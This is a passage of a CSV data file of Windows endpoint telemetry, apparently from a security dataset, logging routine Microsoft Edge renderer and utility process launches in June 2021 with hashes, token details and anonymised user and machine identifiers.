(x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:36.939082700+00:00,2021-06-25 00:41:46.346712800+00:00,e637ddc4-e096-4619-b927-8d63668d70f1,computerpii_0a470890c60768167990033d701e7bd881398861,181312,False,10.7740.19041.1052,False,11540474045178212,,11540474045178264,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1048,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:37.733019900+00:00,6740,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:37.885833200+00:00,2021-06-25 00:41:46.347101400+00:00,f3cfe5b6-d6b4-4af5-969c-f5d43b479014,computerpii_0a470890c60768167990033d701e7bd881398861,181321,False,10.7740.19041.1052,False,11540474045178212,,11540474045178269,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1049,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:38.462720500+00:00,13864,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7016 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:38.535130200+00:00,2021-06-25 00:41:46.347360600+00:00,5223d139-eef7-4821-9479-f9f2d9342e7d,computerpii_0a470890c60768167990033d701e7bd881398861,181329,False,10.7740.19041.1052,False,11540474045178212,,11540474045178271,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1050,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:41.412073800+00:00,5472,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7252 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:41.572557400+00:00,2021-06-25 00:41:46.347755300+00:00,be7d923f-d463-4eec-acbd-94044502e3c4,computerpii_0a470890c60768167990033d701e7bd881398861,181338,False,10.7740.19041.1052,False,11540474045178212,,11540474045178272,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1051,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:41.435216400+00:00,2276,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=7380 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:41.573140400+00:00,2021-06-25 00:41:46.347800100+00:00,220657cf-bc4f-4d72-894c-53d4735af7d7,computerpii_0a470890c60768167990033d701e7bd881398861,181339,False,10.7740.19041.1052,False,11540474045178212,,11540474045178273,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1052,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:42.797363500+00:00,4216,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7408 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:42.930242400+00:00,2021-06-25 00:41:46.348059600+00:00,f8a4c9ac-11a4-44b1-903c-c07e55b7f53a,computerpii_0a470890c60768167990033d701e7bd881398861,181344,False,10.7740.19041.1052,False,11540474045178212,,11540474045178276,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1053,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:45.476024600+00:00,17676,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7232 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:45.731436100+00:00,2021-06-25 00:41:46.348472700+00:00,3745e1b8-ce58-462d-bfd8-8b1dfded8adb,computerpii_0a470890c60768167990033d701e7bd881398861,181352,False,10.7740.19041.1052,False,11540474045178212,,11540474045178279,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1054,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:45.626568200+00:00,252,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7532 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:45.765136600+00:00,2021-06-25 00:41:46.348538600+00:00,fb368f2f-550c-459e-a14e-a94e3b970aeb,computerpii_0a470890c60768167990033d701e7bd881398861,181353,False,10.7740.19041.1052,False,11540474045178212,,11540474045178280,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1055,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:46.651542300+00:00,17092,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7756 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:46.961078200+00:00,2021-06-25 00:41:46.349109700+00:00,98f76085-b019-424c-b6f9-a695f2ce4349,computerpii_0a470890c60768167990033d701e7bd881398861,181363,False,10.7740.19041.1052,False,11540474045178212,,11540474045178281,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,2176,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1056,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:47.955213400+00:00,12612,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=password_manager.breach_detection.mojom.EdgePasswordDataProcessor --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6700 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:48.053950+00:00,2021-06-25 00:41:46.350060+00:00,51b92902-5e49-473a-87c8-4304d2bb1887,computerpii_0a470890c60768167990033d701e7bd881398861,181377,False,10.7740.19041.1052,False,11540474045178212,,11540474045178283,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 